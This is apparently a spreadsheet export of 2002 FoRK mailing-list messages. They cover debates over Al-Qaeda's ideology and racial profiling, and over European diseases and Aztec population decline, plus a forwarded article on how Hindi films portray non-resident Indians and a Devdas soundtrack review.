objects... ?GLM&gt; What else shall we call it?  Just anti-liberal?  Lots of things can be anti-liberal and not be bad.  :)GLM&gt; Better question: What if, as in physics, the laws of human behaviour
GLM&gt; are the same everywhere in the Universe?  What if Al Queda is in fact
GLM&gt; more like our mafia or biker gangs or school board trustees? Well, as sinister as the schoolboard is, they didn't go kill 4k+
people.   Lets put some of this moral relativism de jour into
perspective here.   Al'Qaeda had a fantasy.  This fantasy involved a
whole mess of 'others' not in their collective fantasy.   This _is_
much like the mafia's collective fantasy about brotherhood and
organized crime, or the biker gang's fantasy about being badasses on
the road or the school board's fantasy about indoctrinating your
children with Jesus, but its not equivalent.The terrorists went out, and purposely destroyed things, and killed
people.   This is bad, I don't care what universe you're in.   While
the aspect of 'fantasy' can be applied to all groups, and that label
can be equivalent, the perpetration of the fantasy has different
effects and must be judged differently.   Otherwise, whats a genocide?
Just a father-son complex gone terribly awry?GLM&gt; What if they operate by the same neural-annealing Maxima-Minima
GLM&gt; gratification mechanisms as you or I and every other creature on this
GLM&gt; planet?  They just may, that doesn't dispute that their fantasy was a deadly
one.GLM&gt; What if, instead of magically and uniquely alien, they are, just like
GLM&gt; our own captains and leaders, really only in it for the money, for
GLM&gt; trade rights-of-way and for power over minions who will foolishly make
GLM&gt; it all happen, minions whom they can once again dup with /virtually/
GLM&gt; /identical/ rhetoric ... except we call theirs "fundamentalist islam",
GLM&gt; and they call ours "imperialist satanism"?GLM&gt; When both sides can call the other "evil" to the cheers of their local
GLM&gt; public and media, you can bet something's rotten in the state of Denmark.So your whole point is we too live in a fantasy.  Sure.   No
questions.  Its the thing that bothered me about the article.   I
think the difference between our fantasy and theirs, is that there are
folks out there, in our fantasy allowed to voice their opinons about
the 'fantasy' and keep folks a bit grounded in the real versus the
made-up.   From what I gather, there are no such guards, or
protections on their end.   Thats the problem with some regeimes over
others.   THey all have bad points -- Ours is in a collective fantasy
that we need to control the oil, masking the intentions behind a very
clever, albiet convienent other fantasy of 'terrorism'.   Point is,
Gary, the 'terrorism' fantasy really happened.  People really died.
I won't argue we're innocent in the perpetration of our fantasy, but
I'll argue that we're not just blindly 'cleansing' 'non-humans'.GLM&gt; I guess that's why I live in the woods.  Bears and racoons I
GLM&gt; understand, but I really just don't 'get' people.Too bad bears and racoons don't protect you from the silly fantasies
of people, yours or others.
-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "E" == Eugen Leitl  writes:    E&gt; Seems somebody is so awfully eager to pick up a slice of
    E&gt; research grant pie from the heimatland securitate money they
    E&gt; haven't even bothered to invent a plausible lie.Seems also from the news being reported that it's likely they already
have a slice of that pie, which says something about the mindset of
the people handing out the slices.  Ditto for the biometric airport ID
machines.My personal raw guess: The people with the pie /already/ /know/ the
people with the Ghostbusters Gear, they play golf regularly, have for
years, and perhaps even co-own some private venture that profits win
or lose from the grant.  9-11 seems to have made every
security-oriented-corp shareholder's eyes light up with
red-white-and-blue dollar signs, and like sharks to a cut swimmer or
psychologists to a distressed town, they came swarming on the
motherlode.I only guess that because the pattern seems historically so
statistically prevalent.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "N" == Ned Jackson Lovely  writes:    N&gt; On Sat, Aug 17, 2002 at 01:51:25AM -0400, Gary Lawrence Murphy
    N&gt; wrote:    N&gt; By choosing that term you are certainly attempting to frame the
    N&gt; debate by choosing a fear-charged word.And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them.Wait, wait ... enough tit-for-tat, how about a technical question: How
would _you_ /know/ if you _were_ infected?  Wouldn't the schizophrenia
of the diseased meme be transparent to you, perfectly bonded into your
reality?    N&gt; People require a touch more effort.Spoken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best?"To the enlightened mind, there is no difference between a Brahmin
and a dog" --- guess which moral relativist said it and where.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
Well, for example ..&gt;&gt;&gt;&gt;&gt; "b" == bitbitch   writes:    b&gt; Once we understand this [ the fantasy virus model ], many of
    b&gt; our current perplexities will find themselves
    b&gt; resolved. Pseudo-issues such as debates over the legitimacy of
    b&gt; Â“racial profilingÂ” would disappear: Does anyone in his right
    b&gt; mind object to screening someone entering his country for signs
    b&gt; of plague? Or quarantining those who have contracted it? Or
    b&gt; closely monitoring precisely those populations within his
    b&gt; country that are most at risk?-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Hello Gary,
Uh, plague is not action.  No, no one has a problem quarantining
someone who has say, Ebola, or malaria, because diseases do not
require any decisive action -- just contact.fantasies, still require decisive action, even if its in conjunction
with the way the fantasy works in the individual's brain. Many people
have very strange and obscure fantasies (say wanting to be a model)
that dont' require them to be locked up.Fantasies aren't nearly as much like plagues.   Not everyone in a
given population necessarily adheres to that given fantasy, whereas
everyone can get a given plague.   (BTW, gary, the whole concept of
monitoring a given 'racial populaiton' for fear of them getting a
plague is silly.  I don't think plagues discriminate)You're trying to argue for a lock'em all up mentality, when I don't
think anyone but you has even mentioned it.   His point was that
fantaesies were a psychological? explanation for a possible event.
Not that all people who have them, or even have a certain type, need
to be locked up, quarantined, killed, rubbed-out or cleansed.GLM&gt; Well, for example ..&gt;&gt;&gt;&gt;&gt;&gt; "b" == bitbitch   writes:GLM&gt;     b&gt; Once we understand this [ the fantasy virus model ], many of
GLM&gt;     b&gt; our current perplexities will find themselves
GLM&gt;     b&gt; resolved. Pseudo-issues such as debates over the legitimacy of
GLM&gt;     b&gt; Â“racial profilingÂ” would disappear: Does anyone in his right
GLM&gt;     b&gt; mind object to screening someone entering his country for signs
GLM&gt;     b&gt; of plague? Or quarantining those who have contracted it? Or
GLM&gt;     b&gt; closely monitoring precisely those populations within his
GLM&gt;     b&gt; country that are most at risk?
-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Hello fork,  Whilst digitally meandering around google answers
  (answers.google.com) I came upon an interesting question:  'Whats
  the coolest geektoy for under $50'  and an equally nifty answer
  (albiet a bit off the mark for the question, but it wasn't my money,
  so who cares).  http://www.soundwise.org/id49.htm  Hee.   Visualization with real lights instead of just winamp.
  Sliiiiccckk.-- 
Best regards,
 bitbitch                          mailto:bitbitch@magnesium.net
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>At 12:35 AM -0400 on 8/17/02, Gary Lawrence Murphy wrote:
&gt; Wasn't the Aztec population that greeted Cortez already largely
&gt; decimated by the microbiology brought over by DeSoto nearly a hundred
&gt; years before?&gt;&gt;From my PBS education (Michael whatsisname, the "Alexander" guy, among
other things) on the subject, I believe the smallpox stuff happened
*during* the invasion. The conquistadores themselves were, in fact, disease
vectors.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</si>
  <si>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NRI Number OneExpats help Hindi films make dollars and sense even at their own expenseBy JEANNE E. FREDRIKSENThe expatriate in films is nothing new. Casablanca starring Humphrey 
Bogart as the suave, mysterious Rick in Morocco remains the top favorite 
60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non-resident Indians (NRIs) have with Hindi cinema, 
both at the box office and on the big screen.According to India's 2001 census, the country's population exceeded the 
1 billion persons milestone, and there are approximately 11 million 
Indians living, working, and studying elsewhere around the world. NRIs 
have become a serious market for the Hindi film industry, particularly 
in the U.K., where approximately 3 percent of the population is 
Indian/Pakistani, and in the U.S., where 1.7 million out of 281.5 
million people are Indian. The rupee box office is now augmented quite 
handsomely by the dollar-and-pound box office, much to the delight of 
directors and producers.Among the films reporting a half-to-three-quarters-of-a-million-dollar 
box office in the U.S. or the U.K. are Aa Ab Laut Chalen (1999), Kaho 
Naa Pyaar Hai (2000), Refugee (2000), Lajja (2001), and Asoka (2001). 
The NRI "million-dollar-box-office club" boasts such films as Yaadein 
(2001) and Lagaan (2001) in the U.S. Taal (1999), Hum Saath Saath Hain 
(HSSH, 1999), and Mohabbatein (2000) made the mark or better in the U.K. 
Taal and HSSH doubled their U.K. intakes in the U.S. and brought in $2 
million each. Kuch Kuch Hota Hai (1998) tallied up $2.6 million in the 
U.K. Most recently, setting a new high-water mark in the overseas box 
office, Kabhi Khushi Kabhie Gham (K3G, 2001) grabbed the No. 10 spot its 
first week of release in the U.S. and earned $2.9 million during its 
five-week run. In the U.K., K3G earned nearly $3.6 million over an 18 
week run.Impressive? Yes, considering that promotion of Hindi films outside of 
the Indian community is virtually zero, although that may be on the 
brink of changing slightly. If nothing else, the figures indicate that 
the NRI spends a big chunk of change on the films.During the past decade, the inclusion of NRI characters in both 
commercial and non-commercial films has been on the rise, and in a 
circular logic, it's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NRI?The first Hindi blockbuster to spotlight NRI characters was Dilwale 
Dulhania Le Jayenge (DDLJ, 1995), the story of two young people who grew 
up Indian in London. DDLJ introduced us to the mischievous, 
prank-pulling Raj, who in the beginning fails to graduate but succeeds 
in pilfering a case of beer from an Indian-owned convenience store. In 
the end, he steadfastly applies Indian sensibilities in his pursuit of 
the rebellious-but-trapped Simran as her unwanted arranged marriage 
approaches. Very possibly, because of this juxtaposition of traits, 
attitudes, and events, DDLJ enjoys the distinction of being the 
longest-continually-running film in Indian cinema history.Popularity aside, there is the ongoing issue regarding accuracy in the 
characterization of NRIs in films. Often they are drawn as stereotypes, 
which are easy to lean on, requiring neither depth nor dimension. 
Because of this, Hindi filmmakers may be said to straddle the border 
separating East and West, staying securely at home and dipping into 
their highly-fantasized world of the Indian diaspora.In many cases, commercial Hindi films present an overly-devised sense of 
the NRI as being either corruptly-Westernized or as being more homesick 
than a child gone away to camp for the first time. While these concepts 
may carry a certain truth, the corresponding misconceptions come from 
the minds of the at-home Indians, who wag a seemingly-envious finger at 
the NRI's ability to exist in two worlds: one allowing space and upward 
mobility, the other offering traditions and history.Pompous, materialistic, alcohol-drinking, cigarette-smoking, 
drug-taking, affair-having, spoiled brats â€¦The first Hindi film I saw was Subhash Ghai's Pardes (1997). Despite 
encouraging me to see more films, it made me wonder if "NRI" actually 
meant "Not Really Indian." If the NRI characters weren't silly, whiney 
troublemakers, they were mean and nasty, embracing every possible 
negative human quality in stark contrast to the pristine Kusum Ganga. 
Even the dialogue and song lyrics in the film were designed to instruct 
the viewer that the West is inferior but one can still bring India back 
into one's life. The film is propaganda at its finest and filled with 
relentless reminders of good vs. evil, purity vs. corruption, right vs. 
wrong, traditional vs. modern â€¦ in short India vs. the West.But this is not where the negativity ends.Very often, there is a "dress code" for the female characters to help 
the viewer understand her measure of purity or wickedness: the more 
traditionally-dressed, the more Indian the woman. Unsurprisingly, this 
does not seem to carry over to the men's characters.Running alongside this can be the "training guide" in which NRIs are 
constantly reeducated that "This is not India â€¦," "This is not America 
â€¦," "Only in India â€¦," "This is our culture." The repetition seems less 
designed to be a natural part of life than to foster reinforcement, as 
if NRIs are too ignorant to appreciate it the first time.When Indians achieve success and wealth, have large homes, and own their 
companies in these films, they are industrious, clever, and respected 
businessmen. The NRI equivalent is held up to a double standard and 
considered materialistic. Even the printed synopsis of Taal in the Eros 
Entertainment/B4U DVD booklet refers to the NRI characters' "world of 
ruthless materialism." On the other hand, the Mumbai-based, plagiarizing 
Vikrant Kapoor character is likeable enough and presented as an 
opportunist, which seems to be a step up.Italy is an unlikely origin for an NRI and offspring in a Hindi film, 
but Hum Dil De Chuke Sanam (2000) filled the bill. For all the film's 
splendor, it was regrettable that the Indo-Italian Sameer was presented 
as a naÃ¯ve, bumbling nerd who had little going for him beyond his 
singing ability.Yaadein gave us a kind and loving, if slightly confused, single parent 
from London raising three daughters who suffer enough issues to put a 
therapist into a tailspin. As if that weren't enough, the film includes 
an American-raised brat who wants nothing to do with parents, settling 
down, or having babiesâ€”hardly the ideal Indian bride-to-be.And what happens when a married NRI couple splits into the "modern" vs. 
the "old-fashioned?" The wife is tossed out like the garbage and sent 
home to India as punishment for being unreceptive to having affairs 
outside of marriage. Such is the initial setup for Lajja, Rajkumar 
Santoshi's look into the world of Indian women.Show me the way to go home â€¦The other extreme of NRIs in film is the homesick, culture-craving, 
more-patriotic-than-thou Indian. Building their own mini-Indias for 
maxi-memories, this NRI portrayal takes a real issue and magnifies it to 
unreal proportions. And no film illustrates that as extravagantly as the 
lush and sumptuous Kabhi Khushi Kabhi Gham (K3G).Not only did K3G enjoy a healthy run at home, it exploded worldwide onto 
theater screens in Indian communities last December and played to packed 
houses for weeks. And K3G is a film in which everythingâ€”homes, 
transportation, finances, fashion, holidays, events, emotions, and 
tearsâ€”sets a new standard for the term "larger-than-life."In K3G, much of the post-interval footage takes place in England. For 
Anjali, life in London simmers with a patriotic zeal and an 
all-consuming homesickness manifested in the meticulous maintenance of 
Indian customs and rituals while she separates herself from her 
surroundings. Her need for India is so overwhelming that she relies on 
the false protection of mocking people and places outside of her own 
family and home.Overkill? Certainly, as writer-director Karan Johar's inflated 
representation of what have become some of the filmi passions of the 
typical NRI. But when it boils down to the common denominators without 
the fanfare, flash, and fervor, even those who move across country miss 
their families and familiar surroundings; one always retains a credible 
amount of home-turf loyalty; and if one's heritage is lost, the person 
is rendered as no more than a racial statistic."Those living in India are surrounded by our culture every minute, even 
if they don't realize it," says Vivek Malhotra, a thirty-something NRI 
and business owner in the Chicago area. "Here it's different, but we 
will always be Indian," he continues, striking at the heart of the 
perceived problem. "Sometimes, I feel that the movies think we've 
forgotten that. Maybe the filmmakers should spend some time finding out 
who we are. I really don't think they have a clue."On the upside is a beneficial aspect for the children of NRIs. "It's 
good that these films show our kids what happens in Indiaâ€”the 
traditions, customs, values," says Parag Gandhi, a long time theater 
owner and promoter of Hindi films in Chicago. "They may be modernized in 
India, but the traditional values remain." And many popular films target 
the late-teens, twenty-something demographic. "Films such as Dilwale 
Dulhania Le Jayenge, Kuch Kuch Hota Hai, and K3G," adds Gandhi, "are 
examples of films that are half traditional, half modern, striking a 
balance between the two for all of the markets."Another positive consideration is that not all films show NRIs in a 
questionable light. Caricatures of NRIs have been challenged in 
commercial films like Kaho Naa Pyaar Hai, Dil Chhata Hai (2001), Monsoon 
Wedding (2001), and the recent Kitne Door Kitne Paas, all of which 
present NRIs as more realistic, more human characters. Aa Ab Laut Chalen 
offers a variety of NRI personalities from the selfish, the conniving, 
and the party animal to the lovable cabbies and the pandit-cop who make 
the best of their situations without complaint. Interestingly, the film 
also dares to include shop owners, Dunkin' Donuts clerks, gas station 
attendants: characters who aren't weighed down by palatial surroundings, 
corporate crises, or overseas judgments.The U.S., the U.K., and Australia are represented in Bombay Boys (1999) 
by three young men coming/returning to Bombay, India for personal 
reasons. In a refreshing reversal of the typical attitude concerning 
NRIs in film, the boys are the "good" Indians, and everyone they meet 
has some relationship with the darker side of the city. At its most 
basic, the film shows that if something is lost, it won't necessarily be 
found in India.Even the non-commercial, multi-award-winning Bawandar (2001) 
incorporates an NRI as a connecting thread in the piecing together of 
Sanvri Devi's story. Curious, passionate about women's rights, the 
Indo-English journalist represents the fact that the story has a wider 
interest than a small, rural village.Stepping outside of the Hindi film industry for a moment, the 
English/Telegu film Hyderabad Blues (1998) and the English/Tamil film 
Mitrâ€”My Friend (2002), both smaller-budget films built on delivering 
messages without preaching, deserve mention. The former engages in the 
questioning of, rather than the criticism of, East vs. West, and the 
latter examines the challenges faced by women, NRIs, and their families. 
The characters and stories of both films enjoy respect in their 
presentation, partially due to the existence of layered issues that are 
revealed and resolved (or not) without finger-snapping swiftness or 
clichÃ©d answers. Hyderabad Blues enjoyed a 31-week run in Mumbai alone, 
and Mitrâ€”My Friend is currently one of the most-rented films in Indian 
communities in the U.S.While the inclusion of NRIs in Hindi films does not guarantee box office 
success outside of India, it does send a strong signal that filmmakers 
acknowledge this constantly growing and lucrative audience sector. If 
the big-budget, big box-office commercial films coming out of Mumbai 
often seem to bite one of the hands that feeds it, has the box office 
anywhere been adversely affected? Well â€¦ no, not by any charted reports 
that can be found. And that, itself, sends a loud and clear message back 
to the industry in Mumbai: "if it isn't broken, don't fix it."Nevertheless, when filmmakers who see NRIs as falling only to the evil 
side of Western ways look beyond their assumptions, perhaps they will 
discard their reliance on stereotypes and start paying their overseas 
family an increased measure of respect. And when filmmakers who take the 
homesick and patriotic themes beyond believability analyze their own 
feelings, perhaps they will realize that what NRIs hold dear in their 
hearts is no different from what those at home should be proud of. nNOTE: All box office figures are reported as US$ and are courtesy of 
Variety Magazine online archives. Not all Hindi films abroad report box 
office, and not all box office reports are available.Jeanne E. Fredriksen writes from Chicago. She is family with, friends 
with, acquainted with, and works for NRIs with an amazing variety of 
personalities, attitudes, hopes, dreams, goals, livelihoods, needs, 
wants, and beliefs.=========================================
Â 
Dilwale Dulhaniya Le JayengeSo globally successful is the film that in 1999 it warranted a billboard 
outside Shinjuku train station in Tokyo, Japan, announcing its 
screenings sponsored by India Center there. Shinjuku is the 
entertainment center of Tokyo, and there is plenty of high-profile 
competition for attention, attendance, and box office. In Japan, where 
Indian films enjoy a certain popularity with the natives, the country's 
1995 population census of 125.6 million persons showed only 4,244 were 
Indian with an additional 13,589 being other South Asians. Without 
question, DDLJ continues to be a favorite whenever, wherever offered for 
viewing.Kabhi Khushi Kabhie GhamAccording to a report in the South China Morning Post in January, 2002, 
all screenings of K3G in December, 2001, were sell-outs in Hong Kong, 
while pirated copies of the film were the hottest items circulating on 
the island. Hong Kong's 2001 population census of 6.3 million people 
revealed that 18,543 were Indian and another 23,581 were Nepalese and 
Pakistani. K3G's popularity in the Special Administrative Region was 
impressive because Hong Kong enjoys being the third-largest producer of 
films by volume after India and the U.S. Â 	
=====================================================
Bhansali's Musical HeavenBy ANIRUDDH CHAWDADEVDAS (Universal, 2002). Hindi film soundtrack. Music: Ismail Darbar. 
Lyrics: Nusrat BadrFor perhaps the most eagerly anticipated film of the year, filmmaker 
Sanjay Leela Bhansali's Devdas had to deliver a score that not only met 
the hype but also let Ismail Darbar prove that the mega-selling Hum Dil 
De Chuke Sanam was no one-time flash in the pan. By devising a 
semi-classical, once-in-a-decade, 100 percent "Indian" musical score, 
Bhansali and Darbar emerge victorious in baking and serving a 10-layer 
monumental soundtrack.What is most groundbreaking is the powerful one-two punch of lyrics by 
newcomer Nusrat Badr and the from-soul-voice of first-timer Shreya 
Ghosal. Ghosal's voice, reminiscent of both Suman Kalyanpur with a 
slightly thicker pitch and Anuradha Paudwal without the nasal monotone, 
is the most original singing voice since Kavita Subramaniam appeared in 
the Mangeshkar mold. Ghosal's "Silsila ye chaahat ka" is a sultry 
tabla-dominated opening to 52 minutes of sheer musical bliss. "Maar 
daala" (Subramaniam, KK) is an excellent example of the use of classical 
ragas to complement, rather than fill-in, interludes between verses. On 
"Kahe chhed," Pandit Birju Maharaj, using his own tune, adds an 
intoxicating opening for Madhuri Dixit's vocals and Subramaniam to 
finish out a piercing song of longing.While a combination of Ghosal and Subramaniam give life to on-screen 
lip-synching for Madhuri Dixit and Aishwarya Rai, on the male side Udit 
Narayan fronts for Shah Rukh Khan. Narayan's on-target "Bairi piya," a 
duet with Ghosal, could find company in many Lata-Rafi duets of yore. 
The up-tempo "Chalak chalak" again smoothly floats Narayan with Vinod 
Rathod and Ghosal while Subramaniam and Ghosal's jugalbandhi on "Dola re 
dola" simply shakes the rafters.Packaged in Universal's Bombay plant, the earliest CD pressings have a 
cheap, paper-thin casing. Purists may consider replacing the cheap cover 
with a store-bought sturdier one. At a suggested Bombay retail value of 
about $2 and selling like hot cakes stateside for $10 a pop, Devdas is 
without doubt a huge profit-maker for the multinational music marketer. 
But buyers beware: avoid being distracted by bootleg CDs. This 
exceptional music and exceptionally well-recorded CD deserve 
unadulterated musical glory. Pop in only a properly copyrighted, 
original CD and let Darbar &amp; Co. whisk you away on a magical musical 
ride.Lifelong cinephile Aniruddh Chawda lives, works, and writes from 
Wisconsin, on America's north coast.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>My understanding was 'not really'.  They suffered while Cortez was
there, but they were hardy and exceptionally numerous when he landed.That is from C&amp;C and also another book that I admit I only got half way
through (but long enough for Cortez to get kicked out of the city).John Hall
13464 95th Ave NE
Kirkland WA 98034
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Gary
&gt; Lawrence Murphy
&gt; Sent: Friday, August 16, 2002 9:35 PM
&gt; To: bitbitch@magnesium.net
&gt; Cc: fork@spamassassin.taint.org
&gt; Subject: Re: Al'Qaeda's fantasy ideology: Policy Review no. 114
&gt; 
&gt; 
&gt; Wasn't the Aztec population that greeted Cortez already largely
&gt; decimated by the microbiology brought over by DeSoto nearly a hundred
&gt; years before?
&gt; 
&gt; --
&gt; Gary Lawrence Murphy  TeleDynamics Communications
Inc
&gt;  Business Advantage through Community Software :
http://www.teledyn.com
&gt; "Computers are useless.  They can only give you answers."(Pablo
Picasso)
&gt; 
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>John Hall signs his message:
&gt; John Hall
&gt; 13464 95th Ave NE
&gt; Kirkland WA 98034Is this some new "I'm not spam" signal, to include a 
valid mailing address?- Gordon
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Delivered-To: ip-sub-1-outgoing@admin.listbox.com
Delivered-To: ip-sub-1@majordomo.pobox.com
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Sat, 17 Aug 2002 21:27:04 -0400
Subject: IP: The FCC NPRM  on the Broadcast Flag
From: Dave Farber 
To: ip 
Sender: owner-ip-sub-1@admin.listbox.com
Reply-To: farber@cis.upenn.eduI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wise.I am interested in Ipers opinions on this -- for and against and will share
the responses when I digest them.  (as well as credit the ideas in the
response (with or without attribution -- your call)).Dave
For archives see:
http://www.interesting-people.org/archives/interesting-people/---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</si>
  <si>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Gordon Mohr wrote:
&gt; Is this some new "I'm not spam" signal, to include a 
&gt; valid mailing address?It's so you can still converse with him after the internet
implodes due to spam and bankruptcy.- Joe
-- 
The Combatant State is your father and your mother, your only
protector, the totality of your interests. No discipline can
be stern enough for the man who denies that by word or deed.
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Gary Lawrence Murphy wrote
&gt;Wasn't the Aztec population that greeted Cortez already largely
&gt;decimated by the microbiology brought over by DeSoto nearly a hundred
&gt;years before?Well IIRC, Cortez arrived in 1519, and DeSoto was born circa 1500.
You do the math.I guess that's a "no".R
PS: Funny how the New World world population supposedly had no immunity
    to Old World diseases and died like flies, but the Old World
    population was completely unaffected by New World diseases (other
    than tabacco and syphilis...)  Bullshit meter red-lining again...
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On 8/18/02 2:12 PM, "Robert Harley"  wrote:
&gt; 
&gt; PS: Funny how the New World world population supposedly had no immunity
&gt;   to Old World diseases and died like flies, but the Old World
&gt;   population was completely unaffected by New World diseases (other
&gt;   than tabacco and syphilis...)  Bullshit meter red-lining again...
You aren't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immunities/resistance to common viruses and bacteria
found around the world.  As a result, when the first wholesale mixing of
people from different parts of the world started occurring on a regular
basis, the Europeans fared much better than most others.The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large-scale epidemics and plagues that took
severe tolls on the population.  Modern ethnic Europeans have genetics that
survived a unique and brutal culling process by a rather extensive range of
diseases over dozens of generations.What the geneticists are discovering is that for a great many of the world's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exposed.Cheers,-James Rogers
 jamesr@best.com
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1At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again...See Jared Diamond's excellent "Guns, Germs, and Steel" for the story.Eurasians had outrageously huge, dense, populations to incubate and
immunize whole classes of fatal diseases in, and unobstructed
east-west trans-supercontinental disease transport vectors (horses,
the silk road, sailing ships) to spread them around with.Game over, man. Same thing with war, technology, crops, domestic
animals and everything else worth having in life. :-).Remember Joel Mokyr's definition of progress from "The Lever of
Riches": Progress is more stuff cheaper.Cheers,
RAH-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPWAtT8PxH8jf3ohaEQJ3yACghH1+45PZkGdiocf4RQFpO/fQdNUAoJ/n
tIULaBVQjo/YWd4FlHA5sSRn
=4WRa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</si>
  <si>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The die offs in areas with better records parallel and support the
claims that European diseases were devastating to all American
hemisphere populations, and the reverse was never true.  Unlike, for
example, India or Asia.There is a hot dispute about the original size of the indigenous
population, but the evidence for a high density in the Mexican area is
sound.  It was up here in the North or in the Amazon where I'm a little
more suspicious of very high upward revisions.At least that was my take.I have never heard anyone seriously argue that European diseases were
not a significant factor, or that there were not in fact a lot of Aztec
people prior to Cortez.  Gee, I've never before heard someone argue
unseriously about it either.Do you have a reference for a book or article which does so?&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Robert
&gt; Harley
&gt; Sent: Sunday, August 18, 2002 4:57 PM
&gt; To: fork@spamassassin.taint.org
&gt; Cc: rah@shipwright.com
&gt; Subject: Re: Al'Qaeda's fantasy ideology: Policy Review no. 114
&gt; 
&gt; &gt;See Jared Diamond's excellent "Guns, Germs, and Steel" for the story.
&gt; 
&gt; Yeah, I know the party line.  The evidence for it is extremely meagre.
&gt; New Worlders had two entire continents and tens of millions of people,
&gt; which is a plenty big enough reservoir for infectious diseases to
thrive
&gt; in.  Their records show that they were plagued with them long before
1492.
&gt; 
&gt; Take Ireland in the early 1800s.  Assume a population of circa 8
&gt; million.  Take Ireland around 1900.  Assume a population not much
&gt; above 3 million.  Ignore natural variations between mortality and
&gt; natality.  Omit emigration.  Observe the Great Famine in the middle.
&gt; Deduce that it killed 5 million (actually about 1).  Transpose to 16th
&gt; century Mexico.  Grossly inflate estimates of pre-contact population,
&gt; because nobody has a damn clue what it was anyway.  Underestimate
&gt; later population levels.  Deduce that 10's of millions died.  Lather,
&gt; rinse, repeat.
&gt; 
&gt; R
&gt; http://xent.com/mailman/listinfo/fork
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;See Jared Diamond's excellent "Guns, Germs, and Steel" for the story.Yeah, I know the party line.  The evidence for it is extremely meagre.
New Worlders had two entire continents and tens of millions of people,
which is a plenty big enough reservoir for infectious diseases to thrive
in.  Their records show that they were plagued with them long before 1492.Take Ireland in the early 1800s.  Assume a population of circa 8
million.  Take Ireland around 1900.  Assume a population not much
above 3 million.  Ignore natural variations between mortality and
natality.  Omit emigration.  Observe the Great Famine in the middle.
Deduce that it killed 5 million (actually about 1).  Transpose to 16th
century Mexico.  Grossly inflate estimates of pre-contact population,
because nobody has a damn clue what it was anyway.  Underestimate
later population levels.  Deduce that 10's of millions died.  Lather,
rinse, repeat.R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;There is a hot dispute about the original size of the indigenous
&gt;population, but the evidence for a high density in the Mexican area is
&gt;sound.  It was up here in the North or in the Amazon where I'm a little
&gt;more suspicious of very high upward revisions.Right, there was definitely a relatively high density in Mexico, and
much less elsewhere.  Population estimates vary wildly and about all
your average skeptic can do is take geometric means to get ballpark
figures.  While Central America may have had 20 or 30 million, vast
areas of South America were uninhabited and other places very
sparsely e.g., the plains Indians in what is now the U.S. may have
been 2 million or so.There are those who claim that the Mexican population declined from
20 something million to circa 8 or 10 million in the 16th century,
certainly, in part due to infectious diseases new and old, and other
factors, and was probably in decline before contact.  Others claim it
declined from 80-ish million to 3 or 4 million and somehow deduce 95%
mortality from imported diseases, and have a pretty clear agenda which
makes me (for one) take their claims with a large grain of salt.About all that is certain is that anyone alive in 1500 was dead in 1600,
in the Americas or elsewhere.R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>James Rogers wrote:
&gt;[...] As I understand it, there is a growing body of genetic evidence
&gt;that European immune systems are substantially tougher and more
&gt;resistant to a wider range of infectious diseases than those found in
&gt;other peoples around the world, [...]
&gt;
&gt;The standard theory for this is that Europe was the first major region of
&gt;the planet to become densely populated and urbanized (to the extent that
&gt;they "urbanized" a thousand years ago).  [...]Another theory is that Europe was a rural backyard until the Renaissance,
certainly when compared to big urban centres like Constantinople and Baghdad.I don't know the genetic studies of which you speak, but I know of one that
is sort-of relevant: apparently men of Ashkenazi descent are susceptible
to sickle-cell anemia and the probable reason is that the same genetic
factor that causes that also protects women from tuberculosis (IIRC), which
would have come in handy in central European towns at a time when the Jewish
population was a lot more urbanised than average Joes.R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley  writes:    R&gt; Well IIRC, Cortez arrived in 1519, and DeSoto was born circa
    R&gt; 1500.  You do the math.Ah, I suppose so. If it wasn't DeSoto ... then who was it that landed
in Southern Florida to be greeted by great cities of millions of
mound-dwellers who had completely vanished by the time Cortez arrived
to kill as many as he could?-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;[...] If it wasn't DeSoto ... then who was it that landed in Southern
&gt;Florida to be greeted by great cities of millions of mound-dwellers
&gt;who had completely vanished by the time Cortez arrived to kill as many
&gt;as he could?The tooth fairy?There were never millions of natives in Florida (until recently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disappeared.R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
I thought the mounds were along the southern Mississipi -- and the
operating theory is that the diseases spread ahead of white explorers
and got them before the whites even showed up.
